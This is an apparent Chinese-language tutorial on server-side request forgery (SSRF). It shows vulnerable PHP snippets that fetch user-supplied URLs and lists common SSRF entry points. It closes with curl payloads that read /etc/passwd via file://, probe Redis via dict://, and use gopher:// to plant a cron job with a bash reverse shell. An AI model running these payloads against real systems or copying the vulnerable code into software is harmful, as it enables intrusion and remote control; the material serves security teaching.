WEB常见漏洞之SSRF（基础原理篇）

file_get_contents()fsockopen()curl_exec()fopen()readfile()

<?php$url = $_GET['url'];;echo file_get_contents($url);?>

<?php function GetFile($host,$port,$link) {     $fp = fsockopen($host, intval($port), $errno, $errstr, 30);       if (!$fp) {         echo "$errstr (error number $errno) n";     } else {         $out = "GET $link HTTP/1.1rn";         $out .= "Host: $hostrn";         $out .= "Connection: Closernrn";         $out .= "rn";         fwrite($fp, $out);         $contents='';         while (!feof($fp)) {             $contents.= fgets($fp, 1024);         }         fclose($fp);         return $contents;     } }?>

<?php if (isset($_POST['url'])){    $link = $_POST['url'];    $curlobj = curl_init();// 创建新的 cURL 资源    curl_setopt($curlobj, CURLOPT_POST, 0);    curl_setopt($curlobj,CURLOPT_URL,$link);    curl_setopt($curlobj, CURLOPT_RETURNTRANSFER, 1);// 设置 URL 和相应的选项    $result=curl_exec($curlobj);// 抓取 URL 并把它传递给浏览器    curl_close($curlobj);// 关闭 cURL 资源，并且释放系统资源
    $filename = './curled/'.rand().'.txt';    file_put_contents($filename, $result);     echo $result;}?>

1.一般情况下PHP不会开启fopen的gopher wrapper2.file_get_contents的gopher协议不能URL编码3.file_get_contents关于Gopher的302跳转会出现bug，导致利用失败4.curl/libcurl 7.43 上gopher协议存在bug(%00截断) 经测试7.49 可用5.curl_exec() //默认不跟踪跳转，6.file_get_contents() // file_get_contents支持php://input协议

社交分享功能：获取超链接的标题等内容进行显示转码服务：通过URL地址把原地址的网页内容调优使其适合手机屏幕浏览在线翻译：给网址翻译对应网页的内容图片加载/下载：例如富文本编辑器中的点击下载图片到本地；通过URL地址加载或下载图片图片/文章收藏功能：主要网站会取URL地址中title以及文本的内容作为显示以求一个好的用户体验云服务厂商：它会远程执行一些命令来判断网站是否存活等，所以如果可以捕获相应的信息，就可以进行SSRF测试网站采集，网站抓取的地方：一些网站会针对你输入的url进行一些信息采集工作数据库内置功能：数据库的比如mongodb的copyDatabase函数邮件系统：比如接收邮件服务器地址编码处理, 属性信息处理，文件处理：比如ffpmg，ImageMagick，docx，pdf，xml处理器等未公开的api实现以及其他扩展调用URL的功能：可以利用google 语法加上这些关键字去寻找SSRF漏洞，一些的url中的关键字：share、wap、url、link、src、source、target、u、3g、display、sourceURl、imageURL、domain……从远程服务器请求资源（upload from url 如discuz！；import & expost rss feed 如web blog；使用了xml引擎对象的地方 如wordpress xmlrpc.php）

比如：该资源地址类型为 http://www.xxx.com/a.php?image=（地址）的就可能存在SSRF漏洞

让服务端去访问相应的网址让服务端去访问自己所处内网的一些指纹文件来判断是否存在相应的cms可以使用file、dict、gopher[11]、ftp协议进行请求访问相应的文件攻击内网web应用（可以向内部任意主机的任意端口发送精心构造的数据包{payload}）攻击内网应用程序（利用跨协议通信技术）判断内网主机是否存活：方法是访问看是否有端口开放DoS攻击（请求大文件，始终保持连接keep-alive always）

file：在有回显的情况下，利用 file 协议可以读取任意内容dict：泄露安装软件版本信息，查看端口，操作内网redis服务等gopher：gopher支持发出GET、POST请求：可以先截获get请求包和post请求包，再构造成符合gopher协议的请求。gopher协议是ssrf利用中一个最强大的协议(俗称万能协议)。可用于反弹shellhttp/s：探测内网主机存活

curl -vvv "http://target/ssrf.php?url=file:///etc/passwd"

curl -vvv "http://target/ssrf.php?url=dict://127.0.0.1:6379/info"

curl -vvv "http://target/ssrf.php?url=gopher://127.0.0.1:6379/_*1 %0d %0a $8%0d %0aflushall %0d %0a*3 %0d %0a $3%0d %0aset %0d %0a $1%0d %0a1 %0d %0a $64%0d %0a %0d %0a %0a %0a*/1 * * * * bash -i >& /dev/tcp/127.0.0.1/4444 0>&1 %0a %0a %0a %0a %0a %0d %0a %0d %0a %0d %0a*4 %0d %0a $6%0d %0aconfig %0d %0a $3%0d %0aset %0d %0a $3%0d %0adir %0d %0a $16%0d %0a/var/spool/cron/ %0d %0a*4 %0d %0a $6%0d %0aconfig %0d %0a $3%0d %0aset %0d %0a $10%0d %0adbfilename %0d %0a $4%0d %0aroot %0d %0a*1 %0d %0a $4%0d %0asave %0d %0aquit %0d %0a"

$ curl https://www.example.com

使用file协议curl -v file:///etc/passwd使用ftp协议 curl -v "ftp://127.0.0.1:端口/info"使用dict协议 curl -v "dict://127.0.0.1:端口/info"使用gopher协议 curl -v "gopher://127.0.0.1:端口/_info"